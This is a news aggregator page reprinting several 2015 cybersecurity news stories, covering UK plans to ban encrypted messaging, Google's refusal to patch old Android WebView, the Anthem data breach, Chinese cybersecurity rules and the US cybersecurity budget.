"We've seen proposals similar to this before, but never as unbelievably shortsighted," commented Joseph Hall, chief technologist at the Center for Democracy & Technology.

The FBI has been arguing for years that it needs backdoors into encrypted communications and devices, but Cameron is "going even further to demand no one can have walls," Hall told TechNewsWorld. "He seems to want to ban confidential communications entirely."

The proposal "is particularly boneheaded," because to ban applications such as SnapChat and WhatsApp, the UK would "effectively have to ban mathematics," Hall continued.

"I can write the equation for how to protect a message from government surveillance on a piece of paper, and it's not really hard to write or distribute code that does this," pointed out Danny O'Brien, international director at the Electronic Frontier Foundation.

Without strong cryptography, anyone can intercept content, O'Brien told TechNewsWorld, so governments can "either mandate that no one has secure messaging, except for criminals who are going to use it anyway, or that because we need a secure financial and communications infrastructure, we should work on other ways to fight terrorism."
Other Alternatives

One of the other ways to fight terrorism is to keep a close eye on suspected terrorists.

The French authorities in 2010 reportedly placed under surveillance members of the Islamic extremist cell linked to the gunmen who committed the Charlie Hebdo massacre, but they slacked off after a while.
A Marriage Made in Spy Heaven

Intelligence officials have made the argument that increased surveillance of suspects and perhaps even the imposition of widespread surveillance of the general population are crucial in the fight against terror.

However, such widespread surveillance by the NSA has been notoriously fruitless in the U.S.

Further, the UK's Government Communications Headquarters has spoofed LinkedIn pages to target engineers at a Belgian carrier and apparently aims to be able to track mobile phones worldwide, according to Der Spiegel.

GCHQ reportedly has worked with the United States National Security Agency to make a secret map of the Internet and Web users, The Intercept reported.

The NSA tracks 5 billion cellphone locations worldwide, and since it shares a lot of data with GCHQ, it's possible the UK intelligence agency also has access to much of that data.

Further, German researchers recently demonstrated that vulnerabilities in Signaling System 7 (SS7) telephony signaling protocols let third parties listen in to cellphone calls and intercept text messages despite encryption.
Cameron's Sound and Fury

"I doubt many governments, especially the U.S. government, would agree that [Cameron's plan] is a good idea," the CDT's Hall said.

If they did, the open source nature of much of the pieces of apps like SnapChat and WhatsApp make it easy for people to create such applications themselves, and that could lead to a black market for them, Hall argued.

"Anyone in the UK or out of it could use freely available alternatives" like PGP and OTR to secure their communications, the EFF's O'Brien noted. Banning encrypted apps "would devastate their industry's trust in online communications, leading to a mass exodus of those sectors out of the UK."

Other governments have proactively limited or killed innovative communications applications and methodologies, Charles King, principal analyst at Pund-IT, told TechNewsWorld.

"If Cameron succeeds," he said, "UK citizens can take comfort in their government acting with all the foresight and wisdom of other beacons of freedom, including China, Russia, Egypt and Iran."

Source TechNewsWorld
Read more ...

Google Gives WebView the Cold Shoulder by not fixing vulnerabilities in WebView for Android 4.3

Figures from a seven-day period ending Jan. 5 posted on the Android Developers Dashboard indicate Jelly Bean had 46 percent of the market and KitKat 39 percent. Ice Cream Sandwich had 6.7 percent and Gingerbread 7.8 percent. Lollipop didn't make the cut for the dashboard, which doesn't display any versions with less than 0.1 percent distribution. In other words, a good 60 percent of Android users are at risk from WebView flaws

Google has decided not to fix vulnerabilities in WebView for Android 4.3 and older, sparking heated discussions among developers.

Those versions of WebView run on the WebKit browser. Fixing them "required changes to significant portions of the code and was no longer practical to do so safely," Adrian Ludwig, lead engineer for Android security, explained last week in a post.

Ludwig recommended steps users and developers can take to mitigate the potential exploitation of WebView vulnerabilities without updating to Lollipop, or Android 5.0.

The decision will leave 930 million users of Android devices in the lurch, Tod Bearsley warned earlier this month.

Let 'Em Eat Cake!

Users should employ a browser that has its own content renderer and is regularly updated, Ludwig suggested.

Chrome and Firefox are securely updated through Google Play, he pointed out. Firefox is supported on Android 2.3 and higher, while Chrome is supported on Android 4.0 and higher.

Consumers should load content only from trusted sources, Ludwig advised.

Developers should "confirm that only trusted content ... is displayed within WebViews in their application," he said. They should consider providing their own renderer on Android 4.3 and earlier so they can update it with the latest security patches.
Everybody's Going for Shiny New Stuff

"With the advances in Android 4.4, the number of users that are potentially affected by legacy WebKit security issues is shrinking every day as more and more people upgrade or get new devices," Ludwig observed.

Android 4.4, aka "KitKat," introduced a new WebView component based on the Chromium open source project. It includes an updated version of the V8 JavaScript engine and support for modern Web standards not in the earlier version of WebView.

However, Google's own statistics tell a different tale.

Figures from a seven-day period ending Jan. 5 posted on the Android Developers Dashboard indicate Jelly Bean had 46 percent of the market and KitKat 39 percent. Ice Cream Sandwich had 6.7 percent and Gingerbread 7.8 percent. Lollipop didn't make the cut for the dashboard, which doesn't display any versions with less than 0.1 percent distribution.

In other words, a good 60 percent of Android users are at risk from WebView flaws.

Still, "generally speaking, Google can't go back and support all the old versions," said Al Hilwa, a research program director at IDC.

"You have to have a cutoff at some point and go forward," he told TechNewsWorld. "That's pretty normal for the industry."
Reactions to Ludwig's Ideas

"Telling app developers to just provide your renderer rather than you guys handling your own screw-ups? What a joke," wrote Jake Weisz in response to Ludwig's post. Stating the fix is expensive or difficult "is not an excuse because it's Google's responsibility."

Also, "as a developer of an app that renders content from the open Web, I feel like [the suggestion devs provide their own renderer] badly misrepresents and underestimates the work involved in such a task," Chris Lacy wrote. "Building and shipping a Web render is an absolutely massive task."

From a developer perspective, "it isn't right for Google to not provide backward compatibility or at least a support library for most of the vulnerabilities," said Anirudh Pothani, head of Android development at Copper Mobile.

"This isn't the first time Google has done something to make developers' lives hard by not providing backward compatibility," he told TechNewsWorld.

In most cases, developers "might require a custom implementation of the WebView" to patch the vulnerability, Pothani said.

However, most developers might not do anything to fix the problem, because the independents might not have the time to write their own WebView, he noted, while for corporate devs, most companies "do not provide adequate time to fix issues which might need them to rewrite the core framework being used in their app

Source TechNewsWorld
Read more ...

Health insurer Anthem hit by massive cybersecurity breach

Health insurer Anthem Inc , which has nearly 40 million U.S. customers, said late on Wednesday that hackers had breached one of its IT systems and stolen personal information relating to current and former consumers and employees.

The No. 2 health insurer in the United States said the breach did not appear to involve medical information or financial details such as credit card or bank account numbers.

The information accessed during the "very sophisticated attack" did include names, birthdays, social security numbers, street addresses, email addresses and employment information, including income data, the company said.

Anthem said that it immediately made every effort to close the security vulnerability and reported the attack to the FBI. Cybersecurity firm FireEye Inc said it had been hired to help Anthem investigate the attack.

The company did not say how many customers and staff were affected, but the Wall Street Journal earlier reported it was suspected that records of tens of millions of people had been taken, which would likely make it the largest data breach involving a U.S. health insurer.
View gallery
FireEye information analysts work at the company's …
FireEye information analysts work at the company's office in Milpitas, California, December 29, 2014 …

Anthem had 37.5 million medical members as of the end of December.

"This attack is another reminder of the persistent threats we face, and the need for Congress to take aggressive action to remove legal barriers for sharing cyber threat information," U.S. Rep. Michael McCaul, a Republican from Texas and chairman of the Committee on Homeland Security, said in a statement late Wednesday.

The FBI had warned last August that healthcare industry companies were being targeted by hackers, publicizing the issue following an attack on U.S. hospital group Community Health Systems Inc that resulted in the theft of millions of patient records.

Medical identity theft is often not immediately identified by patients or their provider, giving criminals years to milk such credentials. That makes medical data more valuable than credit cards, which tend to be quickly canceled by banks once fraud is detected.

Security experts say cyber criminals are increasingly targeting the $3 trillion U.S. healthcare industry, which has many companies still reliant on aging computer systems that do not use the latest security features.

Anthem said it would send a letter and email to everyone whose information was stored in the hacked database. It also set up an informational website,, and will offer to provide a credit-monitoring service.
Read more ...

U.S. businesses ask White House to help on China cybersecurity rules

A map of China is seen through a magnifying glass on a computer screen showing binary digits in Singapore in this January 2, 2014 photo illustration. REUTERS/Edgar Su
 U.S. business lobbies called on the White House this week for help to overturn new Chinese cybersecurity regulations they say would hurt market opportunities abroad and jobs in the U.S.

In a letter sent to officials including Secretary of State John Kerry and U.S. Trade Representative Michael Froman on Feb. 4, the U.S. Chamber of Commerce and 16 other U.S. business lobbies said the new rules raised questions about China's international trade commitments.

"(We) request your immediate action to work with Chinese officials to reverse an alarming number of troubling, new Chinese government policies impacting the information and communications technology (ICT) sector," said the letter, first reported in the Wall Street Journal.

Cybersecurity has been a significant irritant in U.S.-China ties, with both sides accusing the other of abuses. U.S. tech groups wrote to the Chinese administration about the same policies on Jan. 28.

New cybersecurity regulations would force technology vendors to Chinese banks to hand over secret source code and adopt Chinese encryption algorithms.

The policies would have a "significant negative impact" on U.S. ICT companies’ market opportunities in China and ultimately crimp investment in research and development back home, hurting U.S. jobs, the groups said.

U.S. manufacturers would also suffer as the policies would restrict cross-border data flows and create another market barrier for foreign financial services and telecommunications companies said the letter, which was also signed by the National Association of Manufacturers.

Source Reuters
Read more ...

Obama seeks $14 billion to boost U.S. cybersecurity defenses

President Barack Obama's budget proposal for the 2016 fiscal year seeks $14 billion (9 billion pounds) for cybersecurity efforts across the U.S. government to better protect federal and private networks from hacking threats.

Federal cybersecurity funding has steadily increased in recent years, reflecting the intensity of threats U.S. companies and government agencies are facing from cyber intruders, both domestic and foreign.

The budget, released on Monday, calls for deployment of more intrusion detection and prevention capabilities, greater sharing of data with the private sector and other countries and more funding to beef up the government's ability to respond to attacks.

The funding would support several specific programs, such as monitoring and diagnostics of federal computer networks, the EINSTEIN intrusion detection and prevention system and government-wide testing and incident-response training.

"Cyber threats targeting the private sector, critical infrastructure and the federal government demonstrate that no sector, network or system is immune to infiltration by those seeking to steal commercial or government secrets and property or perpetrate malicious and disruptive activity," the White House summary said.

It is unclear how much funding the Republican-controlled Congress will dedicate to cybersecurity efforts during the next fiscal year.

Among various requests, the White House sought $227 million for construction of a Civilian Cyber Campus, meant to spur public-private partnerships, and $160 million for information technology and cybersecurity of the weapons programme at the Energy Department's National Nuclear Security Administration.

The Pentagon's budget alone called for $5.5 billion in funding for cybersecurity. The agency's chief weapons tester last month told Congress that nearly every U.S. weapons programme showed "significant vulnerabilities" to cyber attacks, including misconfigured, unpatched and outdated software.

Increased funding for protection of government networks would be good news for big weapons makers like Lockheed Martin Corp, General Dynamics Corp, Northrop Grumman Corp and Raytheon, which already play a big role in cybersecurity, encryption and analysis for defences and intelligence agencies.

A range of medium-sized and smaller companies is also poised to benefit, including Science Applications International Corp, Booz Allen Hamilton, CACI International and Computer Sciences Corp.

In the private sector, where companies have grown increasingly concerned in the wake of attacks on retailers, banks and others, higher spending is likely to boost companies like Hewlett Packard, which offers cybersecurity services.

The White House's budget for most agencies referenced their cybersecurity efforts, including the Department of Health and Human Services and the Office of Personnel Management. Obama also asked for at least $28 million for the Agriculture Department's Chief Information Officer to improve the agency's cybersecurity and $15 million for the FBI's grants, training, and technical assistance programme that helps local law enforcement fight economic, high-technology and Internet crimes.

Source Reuters
Read more ...


Related Posts Plugin for WordPress, Blogger...